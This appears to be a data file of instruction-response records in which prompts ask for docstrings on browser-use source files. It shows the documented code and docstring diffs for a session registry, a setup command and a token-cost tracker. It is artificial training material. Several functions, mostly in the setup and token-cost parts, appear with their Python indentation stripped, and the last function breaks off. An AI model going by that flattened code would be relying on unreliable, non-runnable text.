model_config = ConfigDict(extra='forbid')
@@ -12,4 +14,4 @@ schema_used: dict[str, Any] = Field(description='The JSON Schema that was enforced')
is_partial: bool = Field(default=False, description='True if content was truncated before extraction')
source_url: str | None = Field(default=None, description='URL the content was extracted from')
- content_stats: dict[str, Any] = Field(default_factory=dict, description='Content processing statistics')+ content_stats: dict[str, Any] = Field(default_factory=dict, description='Content processing statistics')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/extraction/views.py |
Help me add docstrings to my project |
import logging
from dataclasses import dataclass, field
from typing import Any
from browser_use.browser.session import BrowserSession
from browser_use.skill_cli.python_session import PythonSession
logger = logging.getLogger(__name__)
@dataclass
class SessionInfo:
	"""Everything belonging to one named session: its launch settings plus the live BrowserSession and its PythonSession."""

	name: str
	browser_mode: str
	headed: bool
	profile: str | None
	browser_session: BrowserSession
	python_session: PythonSession = field(default_factory=PythonSession)
class SessionRegistry:
	"""In-memory registry of named browser sessions.

	Sessions are created lazily by ``get_or_create`` and kept until
	explicitly closed; closing kills the underlying BrowserSession.
	"""

	def __init__(self) -> None:
		self._sessions: dict[str, SessionInfo] = {}

	async def get_or_create(
		self,
		name: str,
		browser_mode: str,
		headed: bool,
		profile: str | None,
	) -> SessionInfo:
		"""Return the session registered under ``name``, creating and starting it on first use.

		NOTE(review): when ``name`` already exists, the requested
		browser_mode/headed/profile are ignored in favor of the existing
		session's settings — confirm this is intended.
		"""
		if name in self._sessions:
			return self._sessions[name]
		logger.info(f'Creating new session: {name} (mode={browser_mode}, headed={headed})')
		browser_session = await create_browser_session(browser_mode, headed, profile)
		await browser_session.start()
		session_info = SessionInfo(
			name=name,
			browser_mode=browser_mode,
			headed=headed,
			profile=profile,
			browser_session=browser_session,
		)
		self._sessions[name] = session_info
		return session_info

	def get(self, name: str) -> SessionInfo | None:
		"""Look up a session by name; returns None when absent."""
		return self._sessions.get(name)

	def list_sessions(self) -> list[dict[str, Any]]:
		"""Summarize all active sessions as plain dicts (name, browser_mode, headed, profile)."""
		return [
			{
				'name': s.name,
				'browser_mode': s.browser_mode,
				'headed': s.headed,
				'profile': s.profile,
			}
			for s in self._sessions.values()
		]

	async def close_session(self, name: str) -> bool:
		"""Kill and deregister one session; returns False when the name is unknown."""
		if name not in self._sessions:
			return False
		session = self._sessions.pop(name)
		logger.info(f'Closing session: {name}')
		# Note: Tunnels are managed independently via tunnel.py
		# They persist across session close/open cycles
		try:
			await session.browser_session.kill()
		except Exception as e:
			logger.warning(f'Error closing session {name}: {e}')
		return True

	async def close_all(self) -> None:
		"""Close every registered session."""
		for name in list(self._sessions.keys()):
			await self.close_session(name)
async def create_browser_session(
	mode: str,
	headed: bool,
	profile: str | None,
) -> BrowserSession:
	"""Build (but do not start) a BrowserSession for the given mode.

	Modes:
	- 'chromium': bundled/managed Chromium.
	- 'real': locally installed Chrome with the user's data dir; ``profile``
	  selects the Chrome profile directory (defaults to 'Default').
	- 'remote': cloud browser (requires an API key); ``profile`` is used as
	  the cloud profile id.

	Raises:
		RuntimeError: when the mode is disabled by the install config, or
			Chrome cannot be found for 'real' mode.
		ValueError: for an unrecognized mode string.
	"""
	from browser_use.skill_cli.install_config import get_mode_unavailable_error, is_mode_available

	# Validate mode is available based on installation config
	if not is_mode_available(mode):
		raise RuntimeError(get_mode_unavailable_error(mode))
	if mode == 'chromium':
		return BrowserSession(
			headless=not headed,
		)
	elif mode == 'real':
		from browser_use.skill_cli.utils import find_chrome_executable, get_chrome_profile_path

		chrome_path = find_chrome_executable()
		if not chrome_path:
			raise RuntimeError('Could not find Chrome executable. Please install Chrome or specify --browser chromium')
		# Always get the Chrome user data directory (not the profile subdirectory)
		user_data_dir = get_chrome_profile_path(None)
		# Profile directory defaults to 'Default', or use the specified profile name
		profile_directory = profile if profile else 'Default'
		return BrowserSession(
			executable_path=chrome_path,
			user_data_dir=user_data_dir,
			profile_directory=profile_directory,
			headless=not headed,  # Headless by default, --headed for visible
		)
	elif mode == 'remote':
		from browser_use.skill_cli.api_key import require_api_key

		require_api_key('Remote browser')
		# Profile is used as cloud_profile_id for remote mode
		return BrowserSession(
			use_cloud=True,
			cloud_profile_id=profile,
		)
	else:
		raise ValueError(f'Unknown browser mode: {mode}')
import logging
from dataclasses import dataclass, field
@@ -11,6 +12,7 @@
@dataclass
class SessionInfo:
+ """Information about a browser session."""
name: str
browser_mode: str
@@ -21,6 +23,11 @@
class SessionRegistry:
+ """Registry of active browser sessions.
+
+ Sessions are created on-demand when first accessed. Each named session
+ is isolated with its own BrowserSession and Python namespace.
+ """
def __init__(self) -> None:
self._sessions: dict[str, SessionInfo] = {}
@@ -32,6 +39,7 @@ headed: bool,
profile: str | None,
) -> SessionInfo:
+ """Get existing session or create new one."""
if name in self._sessions:
return self._sessions[name]
@@ -51,9 +59,11 @@ return session_info
def get(self, name: str) -> SessionInfo | None:
+ """Get session by name."""
return self._sessions.get(name)
def list_sessions(self) -> list[dict[str, Any]]:
+ """List all active sessions."""
return [
{
'name': s.name,
@@ -65,6 +75,7 @@ ]
async def close_session(self, name: str) -> bool:
+ """Close and remove a session."""
if name not in self._sessions:
return False
@@ -81,6 +92,7 @@ return True
async def close_all(self) -> None:
+ """Close all sessions."""
for name in list(self._sessions.keys()):
await self.close_session(name)
@@ -90,6 +102,16 @@ headed: bool,
profile: str | None,
) -> BrowserSession:
+ """Create BrowserSession based on mode.
+
+ Modes:
+ - chromium: Playwright-managed Chromium (default)
+ - real: User's Chrome with profile
+ - remote: Browser-Use Cloud (requires API key)
+
+ Raises:
+ RuntimeError: If the requested mode is not available based on installation config
+ """
from browser_use.skill_cli.install_config import get_mode_unavailable_error, is_mode_available
# Validate mode is available based on installation config
@@ -131,4 +153,4 @@ )
else:
- raise ValueError(f'Unknown browser mode: {mode}')+ raise ValueError(f'Unknown browser mode: {mode}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/sessions.py |
Document this code for team use |
import logging
from typing import Any, Literal
logger = logging.getLogger(__name__)
COMMANDS = {'setup'}
async def handle(
	action: str,
	params: dict[str, Any],
) -> dict[str, Any]:
	"""Entry point for the ``setup`` command.

	Reads ``mode`` ('local'|'remote'|'full'), ``yes``, ``api_key`` and
	``json`` from ``params``, then runs the check -> plan -> execute ->
	validate pipeline. Returns a status dict on success or ``{'error': ...}``
	on any failure (never raises).
	"""
	assert action == 'setup'
	mode: Literal['local', 'remote', 'full'] = params.get('mode', 'local')
	yes: bool = params.get('yes', False)
	api_key: str | None = params.get('api_key')
	json_output: bool = params.get('json', False)
	# Validate mode
	if mode not in ('local', 'remote', 'full'):
		return {'error': f'Invalid mode: {mode}. Must be local, remote, or full'}
	# Run setup flow
	try:
		checks = await run_checks(mode)
		if not json_output:
			_log_checks(checks)
		# Plan actions
		actions = plan_actions(checks, mode, yes, api_key)
		if not json_output:
			_log_actions(actions)
		# Execute actions
		await execute_actions(actions, mode, api_key, json_output)
		# Validate
		validation = await validate_setup(mode)
		if not json_output:
			_log_validation(validation)
		return {
			'status': 'success',
			'mode': mode,
			'checks': checks,
			'validation': validation,
		}
	except Exception as e:
		logger.exception(f'Setup failed: {e}')
		error_msg = str(e)
		# NOTE(review): both branches return the same dict; the json_output split looks vestigial
		if json_output:
			return {'error': error_msg}
		return {'error': error_msg}
async def run_checks(mode: Literal['local', 'remote', 'full']) -> dict[str, Any]:
	"""Inspect the environment without changing anything.

	Which checks run depends on ``mode``: the browser check for local/full,
	the API-key and cloudflared checks for remote/full; the package check
	always runs.

	Returns:
		Dict mapping check name to ``{'status': 'ok'|'missing'|'error', 'message': ...}``.
	"""
	checks: dict[str, Any] = {}
	# Package check
	try:
		import browser_use

		checks['browser_use_package'] = {
			'status': 'ok',
			'message': f'browser-use {browser_use.__version__}'
			if hasattr(browser_use, '__version__')
			else 'browser-use installed',
		}
	except ImportError:
		checks['browser_use_package'] = {
			'status': 'error',
			'message': 'browser-use not installed',
		}
	# Browser check (local and full modes)
	if mode in ('local', 'full'):
		checks['browser'] = await _check_browser()
	# API key check (remote and full modes)
	if mode in ('remote', 'full'):
		from browser_use.skill_cli.api_key import check_api_key

		api_status = check_api_key()
		if api_status['available']:
			checks['api_key'] = {
				'status': 'ok',
				'message': f'Configured via {api_status["source"]} ({api_status["key_prefix"]}...)',
			}
		else:
			checks['api_key'] = {
				'status': 'missing',
				'message': 'Not configured',
			}
	# Cloudflared check (remote and full modes)
	if mode in ('remote', 'full'):
		from browser_use.skill_cli.tunnel import get_tunnel_manager

		tunnel_mgr = get_tunnel_manager()
		status = tunnel_mgr.get_status()
		checks['cloudflared'] = {
			'status': 'ok' if status['available'] else 'missing',
			'message': status['note'],
		}
	return checks
async def _check_browser() -> dict[str, Any]:
	"""Report whether a browser profile can be constructed (no browser is launched).

	NOTE(review): the constructed BrowserProfile is unused — this only proves
	the import and constructor succeed, not that a browser binary exists.
	"""
	try:
		from browser_use.browser.profile import BrowserProfile

		profile = BrowserProfile(headless=True)
		# Just check if we can create a session without actually launching
		return {
			'status': 'ok',
			'message': 'Browser available',
		}
	except Exception as e:
		return {
			'status': 'error',
			'message': f'Browser check failed: {e}',
		}
def plan_actions(
checks: dict[str, Any],
mode: Literal['local', 'remote', 'full'],
yes: bool,
api_key: str | None,
) -> list[dict[str, Any]]:
actions: list[dict[str, Any]] = []
# Browser installation (local/full)
if mode in ('local', 'full'):
browser_check = checks.get('browser', {})
if browser_check.get('status') != 'ok':
actions.append(
{
'type': 'install_browser',
'description': 'Install browser (Chromium)',
'required': True,
}
)
# API key configuration (remote/full)
if mode in ('remote', 'full'):
api_check = checks.get('api_key', {})
if api_check.get('status') != 'ok':
if api_key:
actions.append(
{
'type': 'configure_api_key',
'description': 'Configure API key',
'required': True,
'api_key': api_key,
}
)
elif not yes:
actions.append(
{
'type': 'prompt_api_key',
'description': 'Prompt for API key',
'required': False,
}
)
# Cloudflared (remote/full)
if mode in ('remote', 'full'):
cloudflared_check = checks.get('cloudflared', {})
if cloudflared_check.get('status') != 'ok':
actions.append(
{
'type': 'install_cloudflared',
'description': 'Install cloudflared (for tunneling)',
'required': True,
}
)
return actions
async def execute_actions(
	actions: list[dict[str, Any]],
	mode: Literal['local', 'remote', 'full'],
	api_key: str | None,
	json_output: bool,
) -> None:
	"""Carry out the planned actions, printing progress unless ``json_output``.

	Only 'configure_api_key' performs a real side effect here (saving the
	key); browser install is deferred to first use and cloudflared install
	only prints instructions.
	"""
	for action in actions:
		action_type = action['type']
		if action_type == 'install_browser':
			if not json_output:
				print('📦 Installing Chromium browser (~300MB)...')
			# Browser will be installed on first use by Playwright
			if not json_output:
				print('✓ Browser available (will be installed on first use)')
		elif action_type == 'configure_api_key':
			if not json_output:
				print('🔑 Configuring API key...')
			from browser_use.skill_cli.api_key import save_api_key

			if api_key:
				save_api_key(api_key)
				if not json_output:
					print('✓ API key configured')
		elif action_type == 'prompt_api_key':
			if not json_output:
				print('🔑 API key not configured')
				print('   Set via: export BROWSER_USE_API_KEY=your_key')
				print('   Or: browser-use setup --api-key <key>')
		elif action_type == 'install_cloudflared':
			if not json_output:
				print('⚠ cloudflared not installed')
				print('  Install via:')
				print('    macOS:   brew install cloudflared')
				print(
					'    Linux:   curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -o ~/.local/bin/cloudflared && chmod +x ~/.local/bin/cloudflared'
				)
				print('    Windows: winget install Cloudflare.cloudflared')
				print()
				print('  Or re-run install.sh which installs cloudflared automatically.')
async def validate_setup(
	mode: Literal['local', 'remote', 'full'],
) -> dict[str, Any]:
	"""Re-verify the environment after setup actions have run.

	Returns:
		Dict mapping validation name to 'ok' / failure description (or a
		bool for the availability flags in remote/full mode).
	"""
	results: dict[str, Any] = {}
	# Check imports
	try:
		import browser_use  # noqa: F401

		results['browser_use_import'] = 'ok'
	except ImportError:
		results['browser_use_import'] = 'failed'
	# Validate mode requirements
	if mode in ('local', 'full'):
		try:
			from browser_use.browser.profile import BrowserProfile

			browser_profile = BrowserProfile(headless=True)
			results['browser_available'] = 'ok'
		except Exception as e:
			results['browser_available'] = f'failed: {e}'
	if mode in ('remote', 'full'):
		from browser_use.skill_cli.api_key import check_api_key
		from browser_use.skill_cli.tunnel import get_tunnel_manager

		api_check = check_api_key()
		results['api_key_available'] = api_check['available']
		tunnel_mgr = get_tunnel_manager()
		results['cloudflared_available'] = tunnel_mgr.is_available()
	return results
def _log_checks(checks: dict[str, Any]) -> None:
	"""Print one icon-prefixed line per check result (✓ ok, ⚠ missing, ✗ error)."""
	print('\n✓ Running checks...\n')
	for name, check in checks.items():
		status = check.get('status', 'unknown')
		message = check.get('message', '')
		icon = '✓' if status == 'ok' else '⚠' if status == 'missing' else '✗'
		print(f'  {icon} {name.replace("_", " ")}: {message}')
	print()
def _log_actions(actions: list[dict[str, Any]]) -> None:
	"""Print the planned setup actions as a numbered list (or a no-op notice)."""
	if not actions:
		print('✓ No additional setup needed!\n')
		return
	print('\n📋 Setup actions:\n')
	for i, action in enumerate(actions, 1):
		required = '(required)' if action.get('required') else '(optional)'
		print(f'  {i}. {action["description"]} {required}')
	print()
def _log_validation(validation: dict[str, Any]) -> None:
	"""Print one line per validation result (✓ only for the exact string 'ok')."""
	print('\n✓ Validation:\n')
	for name, result in validation.items():
		icon = '✓' if result == 'ok' else '✗'
		print(f'  {icon} {name.replace("_", " ")}: {result}')
	print()
+
+Handles dependency installation and configuration with mode-based
+setup (local/remote/full) and optional automatic fixes.
+"""
import logging
from typing import Any, Literal
@@ -11,6 +16,7 @@ action: str,
params: dict[str, Any],
) -> dict[str, Any]:
+ """Handle setup command."""
assert action == 'setup'
mode: Literal['local', 'remote', 'full'] = params.get('mode', 'local')
@@ -60,6 +66,11 @@
async def run_checks(mode: Literal['local', 'remote', 'full']) -> dict[str, Any]:
+ """Run pre-flight checks without making changes.
+
+ Returns:
+ Dict mapping check names to their status
+ """
checks: dict[str, Any] = {}
# Package check
@@ -113,6 +124,7 @@
async def _check_browser() -> dict[str, Any]:
+ """Check if browser is available."""
try:
from browser_use.browser.profile import BrowserProfile
@@ -135,6 +147,11 @@ yes: bool,
api_key: str | None,
) -> list[dict[str, Any]]:
+ """Plan which actions to take based on checks.
+
+ Returns:
+ List of actions to execute
+ """
actions: list[dict[str, Any]] = []
# Browser installation (local/full)
@@ -192,6 +209,14 @@ api_key: str | None,
json_output: bool,
) -> None:
+ """Execute planned actions.
+
+ Args:
+ actions: List of actions to execute
+ mode: Setup mode (local/remote/full)
+ api_key: Optional API key to configure
+ json_output: Whether to output JSON
+ """
for action in actions:
action_type = action['type']
@@ -234,6 +259,11 @@ async def validate_setup(
mode: Literal['local', 'remote', 'full'],
) -> dict[str, Any]:
+ """Validate that setup worked.
+
+ Returns:
+ Dict with validation results
+ """
results: dict[str, Any] = {}
# Check imports
@@ -268,6 +298,7 @@
def _log_checks(checks: dict[str, Any]) -> None:
+ """Log check results."""
print('\n✓ Running checks...\n')
for name, check in checks.items():
status = check.get('status', 'unknown')
@@ -278,6 +309,7 @@
def _log_actions(actions: list[dict[str, Any]]) -> None:
+ """Log planned actions."""
if not actions:
print('✓ No additional setup needed!\n')
return
@@ -290,8 +322,9 @@
def _log_validation(validation: dict[str, Any]) -> None:
+ """Log validation results."""
print('\n✓ Validation:\n')
for name, result in validation.items():
icon = '✓' if result == 'ok' else '✗'
print(f' {icon} {name.replace("_", " ")}: {result}')
- print()+ print()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/setup.py |
Add docstrings following best practices |
import logging
import os
from datetime import datetime, timedelta
from pathlib import Path
from typing import Any
import anyio
import httpx
from dotenv import load_dotenv
from browser_use.llm.base import BaseChatModel
from browser_use.llm.views import ChatInvokeUsage
from browser_use.tokens.custom_pricing import CUSTOM_MODEL_PRICING
from browser_use.tokens.mappings import MODEL_TO_LITELLM
from browser_use.tokens.views import (
CachedPricingData,
ModelPricing,
ModelUsageStats,
ModelUsageTokens,
TokenCostCalculated,
TokenUsageEntry,
UsageSummary,
)
from browser_use.utils import create_task_with_error_handling
load_dotenv()
from browser_use.config import CONFIG
logger = logging.getLogger(__name__)
cost_logger = logging.getLogger('cost')
def xdg_cache_home() -> Path:
	"""Resolve the cache root: CONFIG.XDG_CACHE_HOME when set to an absolute path, else ~/.cache."""
	default = Path.home() / '.cache'
	# Relative XDG_CACHE_HOME values are ignored on purpose (per XDG spec they are invalid)
	if CONFIG.XDG_CACHE_HOME and (path := Path(CONFIG.XDG_CACHE_HOME)).is_absolute():
		return path
	return default
class TokenCost:
CACHE_DIR_NAME = 'browser_use/token_cost'
CACHE_DURATION = timedelta(days=1)
PRICING_URL = 'https://raw.githubusercontent.com/BerriAI/litellm/main/model_prices_and_context_window.json'
	def __init__(self, include_cost: bool = False):
		"""Set up empty usage tracking.

		Cost calculation is enabled either by the ``include_cost`` flag or by
		the ``BROWSER_USE_CALCULATE_COST=true`` environment variable; pricing
		data itself is only loaded later, in ``initialize()``.
		"""
		self.include_cost = include_cost or os.getenv('BROWSER_USE_CALCULATE_COST', 'false').lower() == 'true'

		self.usage_history: list[TokenUsageEntry] = []
		self.registered_llms: dict[str, BaseChatModel] = {}
		self._pricing_data: dict[str, Any] | None = None
		self._initialized = False
		self._cache_dir = xdg_cache_home() / self.CACHE_DIR_NAME
async def initialize(self) -> None:
if not self._initialized:
if self.include_cost:
await self._load_pricing_data()
self._initialized = True
async def _load_pricing_data(self) -> None:
# Try to find a valid cache file
cache_file = await self._find_valid_cache()
if cache_file:
await self._load_from_cache(cache_file)
else:
await self._fetch_and_cache_pricing_data()
async def _find_valid_cache(self) -> Path | None:
try:
# Ensure cache directory exists
self._cache_dir.mkdir(parents=True, exist_ok=True)
# List all JSON files in the cache directory
cache_files = list(self._cache_dir.glob('*.json'))
if not cache_files:
return None
# Sort by modification time (most recent first)
cache_files.sort(key=lambda f: f.stat().st_mtime, reverse=True)
# Check each file until we find a valid one
for cache_file in cache_files:
if await self._is_cache_valid(cache_file):
return cache_file
else:
# Clean up old cache files
try:
os.remove(cache_file)
except Exception:
pass
return None
except Exception:
return None
async def _is_cache_valid(self, cache_file: Path) -> bool:
try:
if not cache_file.exists():
return False
# Read the cached data
cached = CachedPricingData.model_validate_json(await anyio.Path(cache_file).read_text())
# Check if cache is still valid
return datetime.now() - cached.timestamp < self.CACHE_DURATION
except Exception:
return False
async def _load_from_cache(self, cache_file: Path) -> None:
try:
content = await anyio.Path(cache_file).read_text()
cached = CachedPricingData.model_validate_json(content)
self._pricing_data = cached.data
except Exception as e:
logger.debug(f'Error loading cached pricing data from {cache_file}: {e}')
# Fall back to fetching
await self._fetch_and_cache_pricing_data()
async def _fetch_and_cache_pricing_data(self) -> None:
try:
async with httpx.AsyncClient() as client:
response = await client.get(self.PRICING_URL, timeout=30)
response.raise_for_status()
self._pricing_data = response.json()
# Create cache object with timestamp
cached = CachedPricingData(timestamp=datetime.now(), data=self._pricing_data or {})
# Ensure cache directory exists
self._cache_dir.mkdir(parents=True, exist_ok=True)
# Create cache file with timestamp in filename
timestamp_str = datetime.now().strftime('%Y%m%d_%H%M%S')
cache_file = self._cache_dir / f'pricing_{timestamp_str}.json'
await anyio.Path(cache_file).write_text(cached.model_dump_json(indent=2))
except Exception as e:
logger.debug(f'Error fetching pricing data: {e}')
# Fall back to empty pricing data
self._pricing_data = {}
async def get_model_pricing(self, model_name: str) -> ModelPricing | None:
# Ensure we're initialized
if not self._initialized:
await self.initialize()
# Check custom pricing first
if model_name in CUSTOM_MODEL_PRICING:
data = CUSTOM_MODEL_PRICING[model_name]
return ModelPricing(
model=model_name,
input_cost_per_token=data.get('input_cost_per_token'),
output_cost_per_token=data.get('output_cost_per_token'),
max_tokens=data.get('max_tokens'),
max_input_tokens=data.get('max_input_tokens'),
max_output_tokens=data.get('max_output_tokens'),
cache_read_input_token_cost=data.get('cache_read_input_token_cost'),
cache_creation_input_token_cost=data.get('cache_creation_input_token_cost'),
)
# Map model name to LiteLLM model name if needed
litellm_model_name = MODEL_TO_LITELLM.get(model_name, model_name)
if not self._pricing_data or litellm_model_name not in self._pricing_data:
return None
data = self._pricing_data[litellm_model_name]
return ModelPricing(
model=model_name,
input_cost_per_token=data.get('input_cost_per_token'),
output_cost_per_token=data.get('output_cost_per_token'),
max_tokens=data.get('max_tokens'),
max_input_tokens=data.get('max_input_tokens'),
max_output_tokens=data.get('max_output_tokens'),
cache_read_input_token_cost=data.get('cache_read_input_token_cost'),
cache_creation_input_token_cost=data.get('cache_creation_input_token_cost'),
)
async def calculate_cost(self, model: str, usage: ChatInvokeUsage) -> TokenCostCalculated | None:
if not self.include_cost:
return None
data = await self.get_model_pricing(model)
if data is None:
return None
uncached_prompt_tokens = usage.prompt_tokens - (usage.prompt_cached_tokens or 0)
return TokenCostCalculated(
new_prompt_tokens=usage.prompt_tokens,
new_prompt_cost=uncached_prompt_tokens * (data.input_cost_per_token or 0),
# Cached tokens
prompt_read_cached_tokens=usage.prompt_cached_tokens,
prompt_read_cached_cost=usage.prompt_cached_tokens * data.cache_read_input_token_cost
if usage.prompt_cached_tokens and data.cache_read_input_token_cost
else None,
# Cache creation tokens
prompt_cached_creation_tokens=usage.prompt_cache_creation_tokens,
prompt_cache_creation_cost=usage.prompt_cache_creation_tokens * data.cache_creation_input_token_cost
if data.cache_creation_input_token_cost and usage.prompt_cache_creation_tokens
else None,
# Completion tokens
completion_tokens=usage.completion_tokens,
completion_cost=usage.completion_tokens * float(data.output_cost_per_token or 0),
)
def add_usage(self, model: str, usage: ChatInvokeUsage) -> TokenUsageEntry:
entry = TokenUsageEntry(
model=model,
timestamp=datetime.now(),
usage=usage,
)
self.usage_history.append(entry)
return entry
# async def _log_non_usage_llm(self, llm: BaseChatModel) -> None:
# """Log non-usage to the logger"""
# C_CYAN = '\033[96m'
# C_RESET = '\033[0m'
# cost_logger.debug(f'🧠 llm : {C_CYAN}{llm.model}{C_RESET} (no usage found)')
async def _log_usage(self, model: str, usage: TokenUsageEntry) -> None:
if not self._initialized:
await self.initialize()
# ANSI color codes
C_CYAN = '\033[96m'
C_GREEN = '\033[92m'
C_RESET = '\033[0m'
# Always get cost breakdown for token details (even if not showing costs)
cost = await self.calculate_cost(model, usage.usage)
# Build input tokens breakdown
input_part = self._build_input_tokens_display(usage.usage, cost)
# Build output tokens display
completion_tokens_fmt = self._format_tokens(usage.usage.completion_tokens)
if self.include_cost and cost and cost.completion_cost > 0:
output_part = f'📤 {C_GREEN}{completion_tokens_fmt} (${cost.completion_cost:.4f}){C_RESET}'
else:
output_part = f'📤 {C_GREEN}{completion_tokens_fmt}{C_RESET}'
cost_logger.debug(f'🧠 {C_CYAN}{model}{C_RESET} | {input_part} | {output_part}')
def _build_input_tokens_display(self, usage: ChatInvokeUsage, cost: TokenCostCalculated | None) -> str:
C_YELLOW = '\033[93m'
C_BLUE = '\033[94m'
C_RESET = '\033[0m'
parts = []
# Always show token breakdown if we have cache information, regardless of cost tracking
if usage.prompt_cached_tokens or usage.prompt_cache_creation_tokens:
# Calculate actual new tokens (non-cached)
new_tokens = usage.prompt_tokens - (usage.prompt_cached_tokens or 0)
if new_tokens > 0:
new_tokens_fmt = self._format_tokens(new_tokens)
if self.include_cost and cost and cost.new_prompt_cost > 0:
parts.append(f'🆕 {C_YELLOW}{new_tokens_fmt} (${cost.new_prompt_cost:.4f}){C_RESET}')
else:
parts.append(f'🆕 {C_YELLOW}{new_tokens_fmt}{C_RESET}')
if usage.prompt_cached_tokens:
cached_tokens_fmt = self._format_tokens(usage.prompt_cached_tokens)
if self.include_cost and cost and cost.prompt_read_cached_cost:
parts.append(f'💾 {C_BLUE}{cached_tokens_fmt} (${cost.prompt_read_cached_cost:.4f}){C_RESET}')
else:
parts.append(f'💾 {C_BLUE}{cached_tokens_fmt}{C_RESET}')
if usage.prompt_cache_creation_tokens:
creation_tokens_fmt = self._format_tokens(usage.prompt_cache_creation_tokens)
if self.include_cost and cost and cost.prompt_cache_creation_cost:
parts.append(f'🔧 {C_BLUE}{creation_tokens_fmt} (${cost.prompt_cache_creation_cost:.4f}){C_RESET}')
else:
parts.append(f'🔧 {C_BLUE}{creation_tokens_fmt}{C_RESET}')
if not parts:
# Fallback to simple display when no cache information available
total_tokens_fmt = self._format_tokens(usage.prompt_tokens)
if self.include_cost and cost and cost.new_prompt_cost > 0:
parts.append(f'📥 {C_YELLOW}{total_tokens_fmt} (${cost.new_prompt_cost:.4f}){C_RESET}')
else:
parts.append(f'📥 {C_YELLOW}{total_tokens_fmt}{C_RESET}')
return ' + '.join(parts)
def register_llm(self, llm: BaseChatModel) -> BaseChatModel:
# Use instance ID as key to avoid collisions between multiple instances
instance_id = str(id(llm))
# Check if this exact instance is already registered
if instance_id in self.registered_llms:
logger.debug(f'LLM instance {instance_id} ({llm.provider}_{llm.model}) is already registered')
return llm
self.registered_llms[instance_id] = llm
# Store the original method
original_ainvoke = llm.ainvoke
# Store reference to self for use in the closure
token_cost_service = self
# Create a wrapped version that tracks usage
async def tracked_ainvoke(messages, output_format=None, **kwargs):
# Call the original method, passing through any additional kwargs
result = await original_ainvoke(messages, output_format, **kwargs)
# Track usage if available (no await needed since add_usage is now sync)
# Use llm.model instead of llm.name for consistency with get_usage_tokens_for_model()
if result.usage:
usage = token_cost_service.add_usage(llm.model, result.usage)
logger.debug(f'Token cost service: {usage}')
create_task_with_error_handling(
token_cost_service._log_usage(llm.model, usage), name='log_token_usage', suppress_exceptions=True
)
# else:
# await token_cost_service._log_non_usage_llm(llm)
return result
# Replace the method with our tracked version
# Using setattr to avoid type checking issues with overloaded methods
setattr(llm, 'ainvoke', tracked_ainvoke)
return llm
def get_usage_tokens_for_model(self, model: str) -> ModelUsageTokens:
filtered_usage = [u for u in self.usage_history if u.model == model]
return ModelUsageTokens(
model=model,
prompt_tokens=sum(u.usage.prompt_tokens for u in filtered_usage),
prompt_cached_tokens=sum(u.usage.prompt_cached_tokens or 0 for u in filtered_usage),
completion_tokens=sum(u.usage.completion_tokens for u in filtered_usage),
total_tokens=sum(u.usage.prompt_tokens + u.usage.completion_tokens for u in filtered_usage),
)
async def get_usage_summary(self, model: str | None = None, since: datetime | None = None) -> UsageSummary:
filtered_usage = self.usage_history
if model:
filtered_usage = [u for u in filtered_usage if u.model == model]
if since:
filtered_usage = [u for u in filtered_usage if u.timestamp >= since]
if not filtered_usage:
return UsageSummary(
total_prompt_tokens=0,
total_prompt_cost=0.0,
total_prompt_cached_tokens=0,
total_prompt_cached_cost=0.0,
total_completion_tokens=0,
total_completion_cost=0.0,
total_tokens=0,
total_cost=0.0,
entry_count=0,
)
# Calculate totals
total_prompt = sum(u.usage.prompt_tokens for u in filtered_usage)
total_completion = sum(u.usage.completion_tokens for u in filtered_usage)
total_tokens = total_prompt + total_completion
total_prompt_cached = sum(u.usage.prompt_cached_tokens or 0 for u in filtered_usage)
# Calculate per-model stats with record-by-record cost calculation
model_stats: dict[str, ModelUsageStats] = {}
total_prompt_cost = 0.0
total_completion_cost = 0.0
total_prompt_cached_cost = 0.0
for entry in filtered_usage:
if entry.model not in model_stats:
model_stats[entry.model] = ModelUsageStats(model=entry.model)
stats = model_stats[entry.model]
stats.prompt_tokens += entry.usage.prompt_tokens
stats.completion_tokens += entry.usage.completion_tokens
stats.total_tokens += entry.usage.prompt_tokens + entry.usage.completion_tokens
stats.invocations += 1
if self.include_cost:
# Calculate cost record by record using the updated calculate_cost function
cost = await self.calculate_cost(entry.model, entry.usage)
if cost:
stats.cost += cost.total_cost
total_prompt_cost += cost.prompt_cost
total_completion_cost += cost.completion_cost
total_prompt_cached_cost += cost.prompt_read_cached_cost or 0
# Calculate averages
for stats in model_stats.values():
if stats.invocations > 0:
stats.average_tokens_per_invocation = stats.total_tokens / stats.invocations
return UsageSummary(
total_prompt_tokens=total_prompt,
total_prompt_cost=total_prompt_cost,
total_prompt_cached_tokens=total_prompt_cached,
total_prompt_cached_cost=total_prompt_cached_cost,
total_completion_tokens=total_completion,
total_completion_cost=total_completion_cost,
total_tokens=total_tokens,
total_cost=total_prompt_cost + total_completion_cost + total_prompt_cached_cost,
entry_count=len(filtered_usage),
by_model=model_stats,
)
def _format_tokens(self, tokens: int) -> str:
if tokens >= 1000000000:
return f'{tokens / 1000000000:.1f}B'
if tokens >= 1000000:
return f'{tokens / 1000000:.1f}M'
if tokens >= 1000:
return f'{tokens / 1000:.1f}k'
return str(tokens)
async def log_usage_summary(self) -> None:
if not self.usage_history:
return
summary = await self.get_usage_summary()
if summary.entry_count == 0:
return
# ANSI color codes
C_CYAN = '\033[96m'
C_YELLOW = '\033[93m'
C_GREEN = '\033[92m'
C_BLUE = '\033[94m'
C_MAGENTA = '\033[95m'
C_RESET = '\033[0m'
C_BOLD = '\033[1m'
# Log overall summary
total_tokens_fmt = self._format_tokens(summary.total_tokens)
prompt_tokens_fmt = self._format_tokens(summary.total_prompt_tokens)
completion_tokens_fmt = self._format_tokens(summary.total_completion_tokens)
# Format cost breakdowns for input and output (only if cost tracking is enabled)
if self.include_cost and summary.total_cost > 0:
total_cost_part = f' (${C_MAGENTA}{summary.total_cost:.4f}{C_RESET})'
prompt_cost_part = f' (${summary.total_prompt_cost:.4f})'
completion_cost_part = f' (${summary.total_completion_cost:.4f})'
else:
total_cost_part = ''
prompt_cost_part = ''
completion_cost_part = ''
if len(summary.by_model) > 1:
cost_logger.debug(
f'💲 {C_BOLD}Total Usage Summary{C_RESET}: {C_BLUE}{total_tokens_fmt} tokens{C_RESET}{total_cost_part} | '
f'⬅️ {C_YELLOW}{prompt_tokens_fmt}{prompt_cost_part}{C_RESET} | ➡️ {C_GREEN}{completion_tokens_fmt}{completion_cost_part}{C_RESET}'
